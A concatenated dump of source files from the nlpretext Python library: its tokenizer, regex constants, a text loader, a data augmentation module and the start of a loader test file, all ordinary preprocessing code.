ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}") 147 | if self.parsed_num is None: 148 | raise ValueError(f"Could not parse phone number {self.parsed_num}") 149 | formatted_number: Optional[str] = _phonenumbers.format_number( 150 | self.parsed_num, standard_format 151 | ) 152 | if formatted_number is None: 153 | raise ValueError(f"Could not format phone number {formatted_number}") 154 | return formatted_number 155 | -------------------------------------------------------------------------------- /nlpretext/token/tokenizer.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | # mypy: disable-error-code="assignment" 19 | 20 | from typing import Any, List, Optional, Union 21 | 22 | import os 23 | import re 24 | 25 | import nltk 26 | import spacy 27 | from sacremoses import MosesDetokenizer, MosesTokenizer 28 | 29 | MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$") 30 | SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"} 31 | 32 | 33 | class LanguageNotHandled(Exception): 34 | pass 35 | 36 | 37 | class LanguageNotInstalledError(Exception): 38 | pass 39 | 40 | 41 | class SpacyModel: 42 | class SingletonSpacyModel: 43 | def __init__(self, lang: str) -> None: 44 | self.lang = lang 45 | if lang == "en": 46 | self.model = _load_spacy_model("en_core_web_sm") 47 | elif lang == "fr": 48 | self.model = _load_spacy_model("fr_core_news_sm") 49 | elif lang == "ko": 50 | self.model = spacy.blank("ko") 51 | elif lang == "ja": 52 | self.model = spacy.blank("ja") 53 | else: 54 | raise (LanguageNotHandled("This spacy model is not available")) 55 | 56 | model: Optional[spacy.language.Language] = None 57 | 58 | def __init__(self, lang): 59 | if not SpacyModel.model: 60 | SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model 61 | 62 | def get_lang_model(self) -> Optional[str]: # noqa: D102 63 | if self.model: 64 | lang: str = self.model.lang 65 | return lang 66 | return None 67 | 68 | 69 | def _load_spacy_model(model: str) -> Any: 70 | try: 71 | return spacy.load(model) 72 | except OSError as e: 73 | if MODEL_REGEX.match(model): 74 | os.system(f"python -m spacy download {model}") # nosec 75 | return spacy.load(model) 76 | else: 77 | raise LanguageNotInstalledError( 78 | f"Model {model} is not installed. " 79 | f"To install, run: python -m spacy download {model}" 80 | ) from e 81 | 82 | 83 | def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]: 84 | """ 85 | Function that gets the right tokenizer given the language. 86 | 87 | Parameters 88 | ---------- 89 | lang : str 90 | Language in which text is written. Languages handled : ["en", "fr", "ko", "ja"] 91 | 92 | Returns 93 | ------- 94 | spacy.tokenizer.Tokenizer 95 | spacy tokenizer 96 | """ 97 | model = SpacyModel(lang).model 98 | if model: 99 | return model.tokenizer 100 | return None 101 | 102 | 103 | def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]: 104 | """ 105 | Convert text to a list of tokens. 106 | 107 | Parameters 108 | ---------- 109 | lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'} 110 | choose the tokenization module according to the langage and the implementation. 111 | Recommanded: Spacy (faster, better results). To process other langages 112 | import models.Spacy_models 113 | 114 | Returns 115 | ------- 116 | list 117 | list of string 118 | 119 | Raises 120 | ------ 121 | ValueError 122 | If lang_module is not a valid module name 123 | """ 124 | if lang_module not in SUPPORTED_LANG_MODULES: 125 | raise ValueError( 126 | f"Invalid lang_module: {lang_module}. " 127 | f"lang_module must be one of {SUPPORTED_LANG_MODULES}." 128 | ) 129 | 130 | tokenized_words: List[str] = [] 131 | if "spacy" in lang_module: 132 | lang = lang_module.split("_")[0] 133 | spacymodel = _get_spacy_tokenizer(lang) 134 | if spacymodel: 135 | spacydoc = spacymodel(text) 136 | tokenized_words = [spacy_token.text for spacy_token in spacydoc] 137 | if lang_module == "en_nltk": 138 | tokenized_words = nltk.word_tokenize(text) 139 | if lang_module == "fr_moses": 140 | tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False) 141 | 142 | return tokenized_words 143 | 144 | 145 | def untokenize(tokens: List[str], lang: str = "fr") -> str: 146 | """ 147 | Inputs a list of tokens output string. 148 | ["J'", 'ai'] >>> "J' ai". 149 | 150 | Parameters 151 | ---------- 152 | lang : string 153 | language code 154 | 155 | Returns 156 | ------- 157 | string 158 | text 159 | """ 160 | d = MosesDetokenizer(lang=lang) 161 | text: str = d.detokenize(tokens, unescape=False) 162 | return text 163 | 164 | 165 | def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str: # noqa: D103 166 | if isinstance(tokens_or_str, str): 167 | return tokens_or_str 168 | if isinstance(tokens_or_str, list): 169 | return untokenize(tokens_or_str) 170 | if tokens_or_str is None: 171 | return "" 172 | raise TypeError("Please input string or tokens") 173 | 174 | 175 | def convert_string_to_tokens( # noqa: D103 176 | tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy" 177 | ) -> List[str]: 178 | if isinstance(tokens_or_str, str): 179 | return tokenize(tokens_or_str, lang_module=lang_module) 180 | if isinstance(tokens_or_str, list): 181 | return tokens_or_str 182 | if tokens_or_str is None: 183 | return [] 184 | raise TypeError("Please input string or tokens") 185 | -------------------------------------------------------------------------------- /nlpretext/_config/constants.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | # mypy: disable-error-code="attr-defined" 16 | 17 | """ 18 | Collection of regular expressions and other (small, generally useful) constants. 19 | Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy. 20 | """ 21 | import re 22 | import sys 23 | import unicodedata 24 | 25 | import regex 26 | 27 | NUMERIC_NE_TYPES = { 28 | "ORDINAL", 29 | "CARDINAL", 30 | "MONEY", 31 | "QUANTITY", 32 | "PERCENT", 33 | "TIME", 34 | "DATE", 35 | } 36 | SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"} 37 | OBJ_DEPS = {"attr", "dobj", "dative", "oprd"} 38 | AUX_DEPS = {"aux", "auxpass", "neg"} 39 | 40 | REPORTING_VERBS = { 41 | "according", 42 | "accuse", 43 | "acknowledge", 44 | "add", 45 | "admit", 46 | "agree", 47 | "allege", 48 | "announce", 49 | "argue", 50 | "ask", 51 | "assert", 52 | "believe", 53 | "blame", 54 | "charge", 55 | "cite", 56 | "claim", 57 | "complain", 58 | "concede", 59 | "conclude", 60 | "confirm", 61 | "contend", 62 | "criticize", 63 | "declare", 64 | "decline", 65 | "deny", 66 | "describe", 67 | "disagree", 68 | "disclose", 69 | "estimate", 70 | "explain", 71 | "fear", 72 | "hope", 73 | "insist", 74 | "maintain", 75 | "mention", 76 | "note", 77 | "observe", 78 | "order", 79 | "predict", 80 | "promise", 81 | "recall", 82 | "recommend", 83 | "reply", 84 | "report", 85 | "say", 86 | "state", 87 | "stress", 88 | "suggest", 89 | "tell", 90 | "testify", 91 | "think", 92 | "urge", 93 | "warn", 94 | "worry", 95 | "write", 96 | } 97 | 98 | CURRENCIES = { 99 | "$": "USD", 100 | "zł": "PLN", 101 | "£": "GBP", 102 | "¥": "JPY", 103 | "฿": "THB", 104 | "₡": "CRC", 105 | "₦": "NGN", 106 | "₩": "KRW", 107 | "₪": "ILS", 108 | "₫": "VND", 109 | "€": "EUR", 110 | "₱": "PHP", 111 | "₲": "PYG", 112 | "₴": "UAH", 113 | "₹": "INR", 114 | } 115 | 116 | POS_REGEX_PATTERNS = { 117 | "en": { 118 | "NP": r"? * ( ? ?)* (| ?)+", 119 | "PP": r" ? * ( ? ?)* ( ?)+", 120 | "VP": r"* * ", 121 | } 122 | } 123 | 124 | PUNCT_TRANSLATE_UNICODE = dict.fromkeys( 125 | (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P")), 126 | " ", 127 | ) 128 | 129 | 130 | ACRONYM_REGEX = re.compile( 131 | r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))", 132 | flags=re.UNICODE, 133 | ) 134 | EMAIL_REGEX = re.compile( 135 | r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))", 136 | flags=re.IGNORECASE | re.UNICODE, 137 | ) 138 | PHONE_REGEX = re.compile( 139 | r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))" # noqa: E501 140 | ) 141 | NUMBERS_REGEX = re.compile( 142 | r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|" 143 | r"(\d*?[.,]\d+)|\d+)(?:|(?=\b))" 144 | ) 145 | CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES))) 146 | LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+") 147 | NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+") 148 | URL_REGEX = re.compile( 149 | r"(?:|(?= 224.0.0.0 163 | # excludes network & broadcast addresses 164 | # (first & last IP address of each class) 165 | r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])" 166 | r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}" 167 | r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))" 168 | r"|" 169 | # host name 170 | r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)" 171 | # domain name 172 | r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*" 173 | # TLD identifier 174 | r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" r")" 175 | # port number 176 | r"(?::\d{2,5})?" 177 | # resource path 178 | r"(?:/\S*)?" r"(?:$|(?![\w?!+&/]))", 179 | flags=re.UNICODE | re.IGNORECASE, 180 | ) # source: https://gist.github.com/dperini/729294 181 | SHORT_URL_REGEX = re.compile( 182 | r"(?:^|(?") 221 | 222 | # TEXT LOADER 223 | TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$") 224 | -------------------------------------------------------------------------------- /nlpretext/textloader.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | from types import ModuleType 16 | from typing import Any, List, Optional, Union 17 | 18 | import sys 19 | import warnings 20 | 21 | import pandas as pd 22 | 23 | try: 24 | from nlpretext._utils import daskloader 25 | except ImportError: 26 | warnings.warn( 27 | "Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]", # noqa: E501 28 | stacklevel=2, 29 | ) 30 | 31 | from nlpretext._utils import pandasloader 32 | from nlpretext._utils.file_loader import check_text_file_format 33 | from nlpretext.preprocessor import Preprocessor 34 | 35 | 36 | class TextLoader: 37 | def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True): 38 | """ 39 | Initialize DataLoader object to retrieve text data. 40 | 41 | Parameters 42 | ---------- 43 | text_column: string 44 | name of the column containing texts in json / csv / parquet files 45 | encoding: string 46 | encoding of the text to be loaded, can be utf-8 or latin-1 for example 47 | file_format: string | None 48 | format of the files to be loaded 49 | use_dask: bool 50 | use dask to load text 51 | """ 52 | self.text_column = text_column 53 | self.encoding = encoding 54 | self.file_format = file_format 55 | 56 | self.use_dask = use_dask 57 | 58 | self.loader: ModuleType 59 | if self.use_dask: 60 | if "dask" in sys.modules: 61 | self.loader = daskloader 62 | else: 63 | warnings.warn( 64 | "Dask is not intalled, switching to pandas. Run pip install dask to use dask", 65 | stacklevel=2, 66 | ) 67 | self.use_dask = False 68 | self.loader = pandasloader 69 | else: 70 | self.loader = pandasloader 71 | 72 | def __repr__(self): 73 | """Method to represent class attributes.""" 74 | class_repr_dict = { 75 | "text_column": self.text_column, 76 | "encoding": self.encoding, 77 | "file_format": self.file_format, 78 | "use_dask": self.use_dask, 79 | } 80 | return f"TextLoader({class_repr_dict})" 81 | 82 | def _read_text_txt(self, files_path): 83 | """ 84 | Read txt text files stored in files_path. 85 | 86 | Parameters 87 | ---------- 88 | files_path : string | list[string] 89 | single or multiple files path 90 | 91 | Returns 92 | ------- 93 | dask.dataframe | pandas.DataFrame 94 | """ 95 | text_ddf = self.loader.read_text(files_path, encoding=self.encoding) 96 | text_ddf.columns = [self.text_column] 97 | return text_ddf 98 | 99 | def _read_text_json(self, files_path): 100 | """ 101 | Read json text files stored in files_path. 102 | 103 | Parameters 104 | ---------- 105 | files_path : string | list[string] 106 | single or multiple files path 107 | 108 | Returns 109 | ------- 110 | dask.dataframe | pandas.DataFrame 111 | """ 112 | text_ddf = self.loader.read_json(files_path, encoding=self.encoding) 113 | try: 114 | return text_ddf[[self.text_column]] 115 | except KeyError as e: 116 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e 117 | 118 | def _read_text_csv(self, files_path): 119 | """ 120 | Read csv text files stored in files_path. 121 | 122 | Parameters 123 | ---------- 124 | files_path : string | list[string] 125 | single or multiple files path 126 | 127 | Returns 128 | ------- 129 | dask.dataframe | pandas.DataFrame 130 | """ 131 | text_ddf = self.loader.read_csv(files_path, encoding=self.encoding) 132 | try: 133 | return text_ddf[[self.text_column]] 134 | except KeyError as e: 135 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e 136 | 137 | def _read_text_parquet(self, files_path): 138 | """ 139 | Read parquet text files stored in files_path. 140 | 141 | Parameters 142 | ---------- 143 | files_path : string | list[string] 144 | single or multiple files path 145 | 146 | Returns 147 | ------- 148 | dask.dataframe | pandas.DataFrame 149 | """ 150 | text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding) 151 | try: 152 | return text_ddf[[self.text_column]] 153 | except KeyError as e: 154 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e 155 | 156 | def read_text( 157 | self, 158 | files_path: Union[str, List[str]], 159 | file_format: Optional[str] = None, 160 | encoding: Optional[str] = None, 161 | compute_to_pandas: bool = True, 162 | preprocessor: Optional[Preprocessor] = None, 163 | ) -> Union[pd.DataFrame, Any]: 164 | """ 165 | Read the text files stored in files_path. 166 | 167 | Parameters 168 | ---------- 169 | files_path: string | list[string] 170 | single or multiple files path 171 | file_format: string 172 | Format of the files to be loaded, to be selected among csv, json, parquet or txt 173 | encoding: 174 | encoding of the text to be loaded, can be utf-8 or latin-1 for example 175 | compute_to_pandas: bool 176 | True if user wants Dask Dataframe to be computed as pandas DF, False otherwise 177 | preprocessor: nlpretext.preprocessor.Preprocessor 178 | NLPretext preprocessor can be specified to pre-process text after loading 179 | 180 | Returns 181 | ------- 182 | dask.dataframe | pandas.DataFrame 183 | """ 184 | if encoding is not None: 185 | self.encoding = encoding 186 | 187 | if file_format is not None: 188 | self.file_format = file_format 189 | else: 190 | self.file_format = check_text_file_format(files_path) 191 | 192 | reader_mapping = { 193 | "csv": self._read_text_csv, 194 | "txt": self._read_text_txt, 195 | "json": self._read_text_json, 196 | "parquet": self._read_text_parquet, 197 | } 198 | reader = reader_mapping.get(self.file_format) 199 | if reader is None: 200 | raise ValueError("Format not handled") 201 | text = reader(files_path) 202 | 203 | if preprocessor is not None: 204 | if isinstance(preprocessor, Preprocessor): 205 | print(f"before: {text.head()}") 206 | text[self.text_column] = text[self.text_column].apply(preprocessor.run) 207 | print(f"after: {text.head()}") 208 | else: 209 | raise ValueError("Only NLPretext preprocessors can be specified") 210 | 211 | if compute_to_pandas and self.use_dask: 212 | return text.compute() 213 | return text 214 | -------------------------------------------------------------------------------- /nlpretext/augmentation/text_augmentation.py: -------------------------------------------------------------------------------- 1 | from typing import Any, Dict, List, Optional, Tuple 2 | 3 | import logging 4 | import re 5 | from itertools import combinations 6 | 7 | import nlpaug.augmenter.word as naw 8 | 9 | 10 | class CouldNotAugment(ValueError): # noqa: D101 11 | pass 12 | 13 | 14 | class UnavailableAugmenter(ValueError): # noqa: D101 15 | pass 16 | 17 | 18 | def augment_text( 19 | text: str, 20 | method: str, 21 | stopwords: Optional[List[str]] = None, 22 | entities: Optional[List[Dict[str, Any]]] = None, 23 | ) -> Tuple[str, List[Dict[str, Any]]]: 24 | """ 25 | Given a text with or without associated entities, generate a new text by 26 | modifying some words in the initial one, modifications depend on the chosen 27 | method (substitution with synonym, addition, deletion). If entities are 28 | given as input, they will remain unchanged. If you want some words other 29 | than entities to remain unchanged, specify it within the stopwords argument. 30 | 31 | Parameters 32 | ---------- 33 | text : string 34 | method : {'wordnet_synonym', 'aug_sub_bert'} 35 | augmenter to use ('wordnet_synonym' or 'aug_sub_bert') 36 | stopwords : list, optional 37 | list of words to freeze throughout the augmentation 38 | entities : list, optional 39 | entities associated to text if any, must be in the following format: 40 | [ 41 | { 42 | 'entity': str, 43 | 'word': str, 44 | 'startCharIndex': int, 45 | 'endCharIndex': int 46 | }, 47 | { 48 | ... 49 | } 50 | ] 51 | 52 | Returns 53 | ------- 54 | Augmented text and optional augmented entities 55 | """ 56 | augmenter = get_augmenter(method, stopwords) 57 | augmented_text = augmenter.augment(text) 58 | if entities is not None: 59 | return process_entities_and_text(entities, text, augmented_text) 60 | return augmented_text, [] 61 | 62 | 63 | def process_entities_and_text( 64 | entities: List[Dict[str, Any]], text: str, augmented_text: str 65 | ) -> Tuple[str, List[Dict[str, Any]]]: 66 | """ 67 | Given a list of initial entities, verify that they have not been altered by 68 | the data augmentation operation and are still in the augmented text. 69 | 70 | Parameters 71 | ---------- 72 | entities: list 73 | entities associated to text, must be in the following format: 74 | [ 75 | { 76 | 'entity': str, 77 | 'word': str, 78 | 'startCharIndex': int, 79 | 'endCharIndex': int 80 | }, 81 | { 82 | ... 83 | } 84 | ] 85 | text: str 86 | initial text 87 | augmented_text: str 88 | new text resulting of data augmentation operation 89 | 90 | Returns 91 | ------- 92 | Augmented text and entities with their updated position in augmented text 93 | """ 94 | formatted_entities = [ 95 | ( 96 | text[entities[i]["startCharIndex"] : entities[i]["endCharIndex"]].strip(), 97 | entities[i]["entity"], 98 | ) 99 | for i in range(len(entities)) 100 | ] 101 | if are_entities_in_augmented_text(entities, augmented_text): 102 | augmented_entities = get_augmented_entities(augmented_text, formatted_entities) 103 | clean_entities = clean_sentence_entities(augmented_text, augmented_entities) 104 | return augmented_text, clean_entities 105 | raise CouldNotAugment("Text was not correctly augmented because entities were altered") 106 | 107 | 108 | def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool: 109 | """ 110 | Given a list of entities, check if all the words associated to each entity 111 | are still present in augmented text. 112 | 113 | Parameters 114 | ---------- 115 | entities : list 116 | entities associated to initial text, must be in the following format: 117 | [ 118 | { 119 | 'entity': str, 120 | 'word': str, 121 | 'startCharIndex': int, 122 | 'endCharIndex': int 123 | }, 124 | { 125 | ... 126 | } 127 | ] 128 | augmented_text : str 129 | 130 | Returns 131 | ------- 132 | True if all entities are present in augmented text, False otherwise 133 | """ 134 | check = True 135 | for ent in entities: 136 | if ent["word"] not in augmented_text: 137 | check = False 138 | return check 139 | return check 140 | 141 | 142 | def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug: 143 | """ 144 | Initialize an augmenter depending on the given method. 145 | 146 | Parameters 147 | ---------- 148 | method : str (supported methods: wordnet_synonym and aug_sub_bert) 149 | stopwords : list 150 | list of words to freeze throughout the augmentation 151 | 152 | Returns 153 | ------- 154 | Initialized nlpaug augmenter 155 | """ 156 | if method == "wordnet_synonym": 157 | return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords) 158 | if method == "aug_sub_bert": 159 | return naw.ContextualWordEmbsAug( 160 | model_path="bert-base-uncased", action="substitute", stopwords=stopwords 161 | ) 162 | raise UnavailableAugmenter( 163 | "The given augmenter is not supported. You must choose one \ 164 | of the following: wordnet_synonym or aug_sub_bert" 165 | ) 166 | 167 | 168 | def get_augmented_entities( 169 | sentence_augmented: str, entities: List[Tuple[str, Any]] 170 | ) -> List[Dict[str, Any]]: 171 | """ 172 | Get entities with updated positions (start and end) in augmented text. 173 | 174 | Parameters 175 | ---------- 176 | sentence_augmented : str 177 | augmented text 178 | entities : list 179 | entities associated to initial text, must be in the following format: 180 | [ 181 | { 182 | 'entity': str, 183 | 'word': str, 184 | 'startCharIndex': int, 185 | 'endCharIndex': int 186 | }, 187 | { 188 | ... 189 | } 190 | ] 191 | 192 | Returns 193 | ------- 194 | Entities with updated positions related to augmented text 195 | """ 196 | entities_augmented = [] 197 | for entity in entities: 198 | search = re.search(entity[0].strip(), sentence_augmented) 199 | if search: 200 | start_index = search.start() 201 | end_index = search.end() 202 | new_entity = { 203 | "entity": entity[1], 204 | "word": sentence_augmented[start_index:end_index], 205 | "startCharIndex": start_index, 206 | "endCharIndex": end_index, 207 | } 208 | entities_augmented.append(new_entity) 209 | return entities_augmented 210 | 211 | 212 | def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]: 213 | """ 214 | Paired entities check to remove nested entities, the longest entity is kept. 215 | 216 | Parameters 217 | ---------- 218 | text : str 219 | augmented text 220 | entities : list 221 | entities associated to augmented text, must be in the following format: 222 | [ 223 | { 224 | 'entity': str, 225 | 'word': str, 226 | 'startCharIndex': int, 227 | 'endCharIndex': int 228 | }, 229 | { 230 | ... 231 | } 232 | ] 233 | 234 | Returns 235 | ------- 236 | Cleaned entities 237 | """ 238 | entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}] 239 | for element1, element2 in combinations(entities_to_clean, 2): 240 | result = check_interval_included(element1, element2) 241 | if result is not None: 242 | try: 243 | entities_to_clean.remove(result[0]) 244 | except IndexError: 245 | logging.warning( 246 | "Cant remove entity : {} \n entities are now :{} \n for sentence : {} ".format( 247 | result, entities_to_clean, text 248 | ) 249 | ) 250 | continue 251 | return entities_to_clean 252 | 253 | 254 | def check_interval_included( 255 | element1: Dict[str, Any], element2: Dict[str, Any] 256 | ) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]: 257 | """ 258 | Comparison of two entities on start and end positions to find if they are nested. 259 | 260 | Parameters 261 | ---------- 262 | element1 : dict 263 | element2 : dict 264 | both of them in the following format 265 | { 266 | 'entity': str, 267 | 'word': str, 268 | 'startCharIndex': int, 269 | 'endCharIndex': int 270 | } 271 | 272 | Returns 273 | ------- 274 | If there is an entity to remove among the two returns a tuple 275 | (element to remove, element to keep). 276 | If not, returns None 277 | """ 278 | if ( 279 | (element1 != element2) 280 | and (element1["startCharIndex"] >= element2["startCharIndex"]) 281 | and (element1["endCharIndex"] <= element2["endCharIndex"]) 282 | ): 283 | return element1, element2 284 | if ( 285 | (element1 != element2) 286 | and (element2["startCharIndex"] >= element1["startCharIndex"]) 287 | and (element2["endCharIndex"] <= element1["endCharIndex"]) 288 | ): 289 | return element2, element1 290 | if ( 291 | (element1 != element2) 292 | and (element1["startCharIndex"] >= element2["startCharIndex"]) 293 | and (element1["endCharIndex"] >= element2["endCharIndex"]) 294 | and (element1["startCharIndex"] <= element2["endCharIndex"] - 1) 295 | ): 296 | return element1, element2 297 | if ( 298 | (element1 != element2) 299 | and (element2["startCharIndex"] >= element1["startCharIndex"]) 300 | and (element2["endCharIndex"] >= element1["endCharIndex"]) 301 | and (element2["startCharIndex"] < element1["endCharIndex"] - 1) 302 | ): 303 | return element2, element1 304 | return None 305 | -------------------------------------------------------------------------------- /tests/test_textloader.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | # mypy: disable-error-code="attr-defined" 19 | 20 | from pathlib import Path 21 | from unittest.mock import MagicMock, patch 22 | 23 | try: 24 | import dask.bag as db 25 | import dask.dataframe as dd 26 | except ImportError as e: 27 | raise ImportError("please install dask: pip install dask[complete]") from e 28 | 29 | try: 30 | import pandas as pd 31 | except ImportError as e: 32 | raise ImportError("please install pandas: pip install pandas") from e 33 | 34 | import pytest 35 | from nlpretext.preprocessor import Preprocessor 36 | from nlpretext.textloader import TextLoader 37 | from pandas.testing import assert_frame_equal 38 | 39 | # pylint: disable=protected-access 40 | 41 | 42 | @patch("dask.bag.read_text") 43 | def test__read_text_txt_dask(mock_read_text): 44 | # Given 45 | files_path = "some_path/to_read.txt" 46 | file_format = "txt" 47 | encoding = "utf-8" 48 | text_column = "text" 49 | mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"]) 50 | 51 | expected_result = dd.from_pandas( 52 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 53 | npartitions=2, 54 | ) 55 | 56 | # When 57 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 58 | actual_result = dummy_instance._read_text_txt(files_path) 59 | 60 | # Then 61 | mock_read_text.assert_called_once_with(files_path, encoding=encoding) 62 | assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True)) 63 | 64 | 65 | @patch("pandas.read_fwf") 66 | def test__read_text_txt_pandas(mock_read_text): 67 | # Given 68 | files_path = "some_path/to_read.txt" 69 | file_format = "txt" 70 | encoding = "utf-8" 71 | text_column = "text" 72 | mock_read_text.return_value = pd.DataFrame( 73 | {text_column: ["This is a text", "This is another text"]} 74 | ) 75 | 76 | expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]}) 77 | 78 | # When 79 | dummy_instance = TextLoader( 80 | file_format=file_format, 81 | use_dask=False, 82 | encoding=encoding, 83 | text_column=text_column, 84 | ) 85 | actual_result = dummy_instance._read_text_txt(files_path) 86 | 87 | # Then 88 | mock_read_text.assert_called_once_with( 89 | str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)] 90 | ) 91 | assert_frame_equal(expected_result, actual_result.reset_index(drop=True)) 92 | 93 | 94 | @patch("nlpretext._utils.daskloader.dd") 95 | def test__read_text_json_dask(mock_read): 96 | # Given 97 | files_path = "some_path/to_read.json" 98 | file_format = "json" 99 | encoding = "utf-8" 100 | text_column = "text" 101 | 102 | text_ddf = dd.from_pandas( 103 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 104 | npartitions=2, 105 | ) 106 | mock_read.read_json.return_value = text_ddf 107 | 108 | expected_result = text_ddf[[text_column]] 109 | 110 | # When 111 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 112 | actual_result = dummy_instance._read_text_json(files_path) 113 | 114 | # Then 115 | mock_read.read_json.assert_called_once_with(files_path, encoding=encoding) 116 | assert_frame_equal(expected_result.compute(), actual_result.compute()) 117 | 118 | 119 | @patch("nlpretext._utils.pandasloader.read_json") 120 | def test__read_text_json_pandas(mock_read): 121 | # Given 122 | files_path = "some_path/to_read.txt" 123 | file_format = "txt" 124 | encoding = "utf-8" 125 | text_column = "text" 126 | 127 | dummy_instance = TextLoader( 128 | file_format=file_format, 129 | use_dask=False, 130 | encoding=encoding, 131 | text_column=text_column, 132 | ) 133 | dummy_instance._read_text_json(files_path) 134 | 135 | # Then 136 | mock_read.assert_called_once_with(files_path, encoding=encoding) 137 | 138 | 139 | @patch("dask.dataframe.read_csv") 140 | def test__read_text_csv_dask(mock_read_csv): 141 | # Given 142 | files_path = "some_path/to_read.csv" 